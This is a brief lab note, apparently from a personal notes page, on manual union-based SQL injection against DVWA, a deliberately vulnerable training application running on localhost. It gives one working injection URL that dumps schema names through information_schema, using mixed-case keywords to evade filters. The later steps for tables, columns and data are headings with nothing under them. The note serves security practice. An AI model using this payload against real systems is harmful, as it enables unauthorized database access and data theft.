DVWA_Easy_Manualy_Dump
Extract database name
http://127.0.0.1:42001/vulnerabilities/sqli/?id=0%27union%20select%201,gRoUp_cOncaT(0x7c,schema_name,0x7c)%20fRoM%20information_schema.schemata--%20-&Submit=Submit#union select 1,gRoUp_cOncaT(0x7c,schema_name,0x7c) fRoM information_schema.schemata
Extract tables from database

Extract column name from database
or
Note: here column name can be from different table as well comment_id and comment is from guestbook table So Craft payload accordingly for dumping full data
EXTRACT data from table

Last updated